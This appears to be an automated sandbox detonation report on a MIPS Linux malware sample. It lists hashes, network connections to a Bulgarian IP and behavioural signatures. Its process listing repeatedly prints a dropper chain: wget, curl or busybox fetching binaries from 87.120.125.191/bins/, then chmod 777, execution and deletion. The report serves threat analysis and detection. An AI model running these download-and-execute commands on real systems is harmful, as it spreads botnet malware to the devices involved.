[wget http://87.120.125.191/bins/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]
/bin/chmod
[chmod 777 3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]
/tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6
[./3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]
/bin/rm
[rm 3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]
/usr/bin/wget
[wget http://87.120.125.191/bins/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]
/bin/chmod
[chmod 777 nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]
/tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc
[./nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]
/bin/rm
[rm nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]
/usr/bin/wget
[wget http://87.120.125.191/bins/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]
/bin/chmod
[chmod 777 C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]
/tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD
[./C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]
/bin/rm
[rm C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]
/usr/bin/wget
[wget http://87.120.125.191/bins/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]
/bin/chmod
[chmod 777 6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]
/tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn
[./6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]
/bin/rm
[rm 6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]
/usr/bin/wget
[wget http://87.120.125.191/bins/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]
/bin/chmod
[chmod 777 L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]
/tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM
[./L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]
/bin/rm
[rm L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]
/usr/bin/wget
[wget http://87.120.125.191/bins/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]
/bin/chmod
[chmod 777 Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]
/tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z
[./Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]
/bin/rm
[rm Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]
/usr/bin/wget
[wget http://87.120.125.191/bins/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]
/bin/chmod
[chmod 777 TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]
/tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ
[./TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]
/bin/rm
[rm TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]
/usr/bin/wget
[wget http://87.120.125.191/bins/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]
/bin/chmod
[chmod 777 UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]
/tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm
[./UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]
/bin/rm
[rm UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]
/usr/bin/wget
[wget http://87.120.125.191/bins/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]
/bin/chmod
[chmod 777 3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]
/tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6
[./3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]
/bin/rm
[rm 3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]
/usr/bin/wget
[wget http://87.120.125.191/bins/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]
/bin/chmod
[chmod 777 6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]
/tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn
[./6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]
/bin/rm
[rm 6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]
/usr/bin/wget
[wget http://87.120.125.191/bins/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]
/bin/chmod
[chmod 777 L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]
/tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM
[./L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]
/bin/rm
[rm L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]
/usr/bin/wget
[wget http://87.120.125.191/bins/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]
/bin/chmod
[chmod 777 Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]
/tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z
[./Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]
/bin/rm
[rm Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]
/usr/bin/wget
[wget http://87.120.125.191/bins/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]
/bin/chmod
[chmod 777 TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]
/tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ
[./TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]
/bin/rm
[rm TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]
/usr/bin/wget
[wget http://87.120.125.191/bins/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]
/bin/chmod
[chmod 777 nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]
/tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc
[./nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]
/bin/rm
[rm nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]
/usr/bin/wget
[wget http://87.120.125.191/bins/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]
/bin/chmod
[chmod 777 C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]
/tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD
[./C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]
/bin/rm
[rm C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]
/usr/bin/wget
[wget http://87.120.125.191/bins/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]
/bin/chmod
[chmod 777 tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]
/tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
[./tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]
/bin/rm
[rm tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]
/usr/bin/wget
[wget http://87.120.125.191/bins/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]
/bin/chmod
[chmod 777 B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]
/tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs
[./B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]
/bin/rm
[rm B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]
/usr/bin/wget
[wget http://87.120.125.191/bins/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]
/bin/chmod
[chmod 777 ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]
/tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G
[./ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]
/bin/rm
[rm ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]
/usr/bin/wget
[wget http://87.120.125.191/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]
/bin/chmod
[chmod 777 1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]
/tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls
[./1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]
/bin/rm
[rm 1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]
/usr/bin/wget
[wget http://87.120.125.191/bins/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]
/bin/chmod
[chmod 777 zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]
/tmp/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb
[./zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]
/bin/rm
[rm zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]
/usr/bin/wget
[wget http://87.120.125.191/bins/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]
/bin/chmod
[chmod 777 p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]
/tmp/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe
[./p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]
/bin/rm
[rm p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]
Network
| Country | Destination | Domain | Proto |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
Files
/tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-21 07:29
Reported
2024-11-21 07:31
Platform
debian9-mipsel-20240418-en
Max time kernel
61s
Max time network
64s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls | /tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls | N/A |
| N/A | /tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs | /tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs | N/A |
| N/A | /tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs | /tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs | N/A |
| N/A | /tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G | /tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G | N/A |
| N/A | /tmp/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb | /tmp/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb | N/A |
| N/A | /tmp/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe | /tmp/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe | N/A |
| N/A | /tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm | /tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm | N/A |
| N/A | /tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6 | /tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6 | N/A |
| N/A | /tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc | /tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc | N/A |
| N/A | /tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD | /tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD | N/A |
| N/A | /tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn | /tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn | N/A |
| N/A | /tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM | /tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM | N/A |
| N/A | /tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z | /tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z | N/A |
| N/A | /tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ | /tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ | N/A |
| N/A | /tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm | /tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm | N/A |
| N/A | /tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6 | /tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6 | N/A |
| N/A | /tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn | /tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn | N/A |
| N/A | /tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM | /tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM | N/A |
| N/A | /tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z | /tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z | N/A |
| N/A | /tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ | /tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ | N/A |
| N/A | /tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc | /tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc | N/A |
| N/A | /tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD | /tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD | N/A |
| N/A | /tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs | /tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs | N/A |
| N/A | /tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs | /tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs | N/A |
| N/A | /tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G | /tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G | N/A |
| N/A | /tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls | /tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls | N/A |
| N/A | /tmp/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb | /tmp/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb | N/A |
| N/A | /tmp/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe | /tmp/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
